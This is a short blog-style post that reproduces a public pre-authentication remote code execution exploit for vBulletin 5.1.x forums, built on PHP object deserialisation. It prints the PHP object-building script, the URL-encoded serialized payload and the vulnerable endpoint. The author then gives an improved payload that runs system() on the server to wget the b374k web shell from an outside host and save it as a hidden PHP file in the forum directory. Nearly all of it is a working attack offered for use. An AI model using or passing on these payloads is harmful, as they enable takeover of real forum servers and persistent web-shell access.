So, It has been all over news. Remote code execution in vBulletin forums due to unserialize function.
“vBulletin 5.1.x – PreAuth 0day Remote Code Execution Exploit”
# Exploit Title: Vbulletin 5.1.X unserialize 0day preauth RCE exploit # Date: Nov 4th, 2015 # Exploit Author: hhjj # Vendor Homepage: http://www.vbulletin.com/ # Version: 5.1.x # Tested on: Debian # CVE : # I did not discover this exploit, leaked from the IoT. # Build the object php << 'eof' <?php class vB_Database { public $functions = array(); public function __construct() { $this->functions['free_result'] = 'phpinfo'; } } class vB_dB_Result { protected $db; protected $recordset; public function __construct() { $this->db = new vB_Database(); $this->recordset = 1; } } print urlencode(serialize(new vB_dB_Result())) . "\n"; eof O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bi%3A1%3B%7D #Then hit decodeArguments with your payload : http://localhost/vbforum/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2a%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2a%00recordset%22%3Bi%3A1%3B%7D
The original post POC shared doesnt actually help you in executing commands on webserver. Following payload would help you in executing commands on webserver.
http:/osssd.com/forums/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A{s%3A5%3A%22%00*%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A{s%3A9%3A%22functions%22%3Ba%3A1%3A{s%3A11%3A%22free_result%22%3Bs%3A6%3A%22assert%22%3B}}s%3A12%3A%22%00*%00recordset%22%3Bs%3A85%3A%22system%28%22wget+https://b374k-shell.googlecode.com/files/b374k-2.8.php+-O+.jlsabse.php%22%29%22%3B}
About mentioned payload would “wget” and save file as “.jlsabse.php” in forums main directory.
Thanks.